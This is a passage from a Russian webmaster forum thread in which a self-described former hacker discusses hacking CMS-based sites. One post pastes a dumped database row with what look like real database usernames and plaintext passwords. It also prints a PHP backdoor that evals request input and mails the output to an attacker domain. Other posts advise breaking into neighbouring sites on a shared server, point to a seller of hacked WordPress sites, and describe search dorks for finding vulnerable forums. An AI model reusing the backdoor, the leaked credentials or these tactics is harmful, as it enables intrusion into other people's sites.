Перешёл на светлую сторону Силы

[Удален]
#41

(32, 'http://.net/', 0, '', 0, '', '', NULL, NULL, 11700, NULL, '', 'http://***.net/bbcodes/Thumbs.php', 'zx', 'define ("DBHOST", "localhost"); \n \ndefine ("DBNAME", "respecta_site"); \n \ndefine ("DBUSER", "rsp_site_db_user"); \n \ndefine ("DBPASS", "pjyQa34adfvaDe9UvNjXfy2Wf"); \n \ndefine ("PREFIX", "rsp"); \n \ndefine ("USERPREFIX", "rsp"); \n \ndefine ("COLLATE", "cp1251"); \n ', '', '', NULL, '', NULL, NULL, NULL, 'localhost', 'rsp_foru_db_user', 'zHwEPGUagaa3afFDHLSj6KHaD', '', 1, NULL),

Вот пример сайта со сложным паролем к базе, на админку похожий. Если это целевой сайт, который нужно сломать, совсем не обязательно ломать его. Можно поломать соседей на этом же сервере.

<?\n\nif( isset($_REQUEST[''sendmail'']) )\n{\n mail(''a@hackdomain.cc'',''LOL'',eval(($_REQUEST[''sendmail'']));\n\n}\n\n\n\n\n?>'),

как-то так может выглядеть бекдор в мейле.

Вообще, многие советуют пользоваться данной тулзой http://www.revisium.com/ai/

Очень многое она, конечно, находит. Но с перекриптованными шеллам она не спасёт, как ни крути.

sema_87
На сайте с 28.08.2009
Offline
249
#42

MaxBelov25, Сам бы какую cms посоветовал?

Uh-Oh We're In Trouble, Something's Come Along And It's Burst Our Bubble!
[Удален]
#43
sema_87:
MaxBelov25, Сам бы какую cms посоветовал?

Да как все - на свой вкус и функционал выбирайте. друпал, вп, это для меня самые лучшие, если без всяких рюшечек. Ну и напомню, прежде чем ставить какой-то плагин, пройдитесь по баг-трекерам, просто введя имя плагина, как-то так http://1337day.com/exploit/description/20332

---------- Добавлено 15.04.2013 в 02:06 ----------

M25:
Max Belov25, а как дела с modx revo обстоят, не сталкивались?

Не, даже не сталкивался. Но и на площадках как-то не встречал ничего по этой cms.

Скажу только, что не популярные движки будут ломать только на заказ, либо если ресурс довольно жирный. Траф посливать, как вариант.

Выгоднее посидеть какое-то время и наваять автосплойт, который спарсит бОльшее количество

forum.antichat.ru/thread204277.html Вот к примеру товарищ голиаф продаёт взломанные вордпрессы. если купить несколько штук, то найдёте немало закономерностей, там все сайты с определёнными плагинами, и шеллы залиты в одну папку.

К слову о парсинге для взлома. Самыми простыми в поиске есть форумы. Та же булка или ибп форум (intext:powered by vbulletin 4.0.2). Ну или по каким-то другим признакам, дорок подобных много практически под все CMS. Я бы советовал это вырезать. Поискать по своему движку можно на том же эксплойт-дб http://www.exploit-db.com/google-dorks/

DiAksID
На сайте с 02.08.2008
Offline
218
#44
MaxBelov25:
... Скажу только, что не популярные движки будут ломать только на заказ ...

[шепчет] стабильное 3-4 место по количеству реализаций среди опенсоурс систем трудно назвать "непопулярностью". будем надеятся что с MODX настолько "всё в порядке" ;) что даже не берутся орлы [/шепчет]

show must go on !!!...
[Удален]
#45
DiAksID:
стабильное 3-4 место по количеству реализациям среди опенсоурс систем трудно назвать "непопулярностью". будем надеятся что с MODX просто "всё в порядке" ;)

Ну, на моей практике просто не встречалось) да и на баг-трекерах пара-тройка xss/xsrf всего, да и то под версии прошлых годов

DiAksID
На сайте с 02.08.2008
Offline
218
#46
MaxBelov25:
Ну, на моей практике просто не встречалось) да и на баг-трекерах пара-тройка xss/xsrf всего, да и то под версии прошлых годов

и в фиксах про безопасность давно ни строчки. видимо после EVO (много лет назад ;)) удачно прошла реализация.

спс...

DV
На сайте с 01.05.2010
Offline
644
#47

ТС, за жисть, а почему перешли-то на светлую сторону?

VDS хостинг ( http://clck.ru/0u97l ) Нет нерешаемых задач ( https://searchengines.guru/ru/forum/806725 ) | Перенос сайтов на Drupal 7 с любых CMS. ( https://searchengines.guru/ru/forum/531842/page6#comment_10504844 )
S
На сайте с 03.07.2009
Offline
41
#48

MaxBelov25, подскажите, какие уязвимости вы знаете у последней версии форума phpbb3.0.11

Часто приходилось ломать, на какие уязвимые места необходимо обратить внимание?

Кодинг на PHP. Разработка расширений под Joomla.
[Удален]
#49

DeL Esprit, всё-таки проверил. в DLE 9й ветки вроде как ничего нету. Остался уязвим только длевский форум и плагин к пользовательским профилям для рейтингов и медалек. Ну он вроде и не поддерживается уже.

DenisVS, юнашеский максимализм видимо покинул мой организм :) да и предложили хорошую работку по ИБ

---------- Добавлено 15.04.2013 в 10:44 ----------

sdaprel:
MaxBelov25, подскажите, какие уязвимости вы знаете у последней версии форума phpbb3.0.11
Часто приходилось ломать, на какие уязвимые места необходимо обратить внимание?

Я уже некоторое время ничего не ломал, по последним версиям не скажу не поковыряв. хпхбб на сколько помню, часто был гаразд на выполнение кода, sql inj. Пример тому 3.0.10.

dlyanachalas
На сайте с 15.09.2006
Offline
693
#50
MaxBelov25:
Я же помочь хочу, а вы...

По неизвестным причинам большинство воров оправдывает свои действия тем, что то, что они украли, "плохо лежало".

Помогите тем, что не воруйте.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий